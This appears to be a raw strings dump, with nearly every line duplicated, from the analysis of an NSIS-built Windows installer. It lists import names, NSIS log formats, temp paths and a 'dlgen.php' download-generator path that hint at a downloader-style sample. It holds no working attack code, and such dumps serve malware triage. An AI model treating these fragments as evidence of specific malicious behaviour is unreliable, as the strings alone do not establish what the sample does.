C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv14.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv14.tmp
dlgen.php?r=vu_vo2_
dlgen.php?r=vu_vo2_
)-.Yln
)-.Yln
Nullsoft Install System v2.46
Nullsoft Install System v2.46
1.0.0.1
1.0.0.1
nsg16.tmp_1164:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
@.reloc
@.reloc
RegDeleteKeyExW
RegDeleteKeyExW
Kernel32.DLL
Kernel32.DLL
PSAPI.DLL
PSAPI.DLL
%s=%s
%s=%s
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
GetAsyncKeyState
GetAsyncKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationW
SHFileOperationW
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegEnumKeyW
RegEnumKeyW
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
h.hTZ
h.hTZ
,T.UV
,T.UV
Nullsoft Install System v2.46.5-Unicode
Nullsoft Install System v2.46.5-Unicode
logging set to %d
logging set to %d
settings logging to %d
settings logging to %d
created uninstaller: %d, "%s"
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: success ("%s")
Exec: command="%s"
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack
Exch: stack
RMDir: "%s"
RMDir: "%s"
MessageBox: %d,"%s"
MessageBox: %d,"%s"
Delete: "%s"
Delete: "%s"
File: wrote %d to "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename failed: %s
Rename on reboot: %s
Rename on reboot: %s
Rename: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
SetFileAttributes: "%s":X
Sleep(%d)
Sleep(%d)
detailprint: %s
detailprint: %s
Call: %d
Call: %d
Aborting: "%s"
Aborting: "%s"
Jump: %d
Jump: %d
verifying installer: %d%%
verifying installer: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
install.log
install.log
%u.%u%s%s
%u.%u%s%s
Skipping section: "%s"
Skipping section: "%s"
Section: "%s"
Section: "%s"
New install of "%s" to "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
*?|/":
*?|/":
invalid registry key
invalid registry key
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
x%c
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
%s: failed opening file "%s"
%Program Files%
%Program Files%
\System.dll
\System.dll
\nsExec.dll
\nsExec.dll
\INetC.dll
\INetC.dll
Nullsoft Install System (Unicode) v2.46.5-Unicode
Nullsoft Install System (Unicode) v2.46.5-Unicode
\wininit.ini
\wininit.ini
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsg16.tmp
nsg16.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx1A.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx1A.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp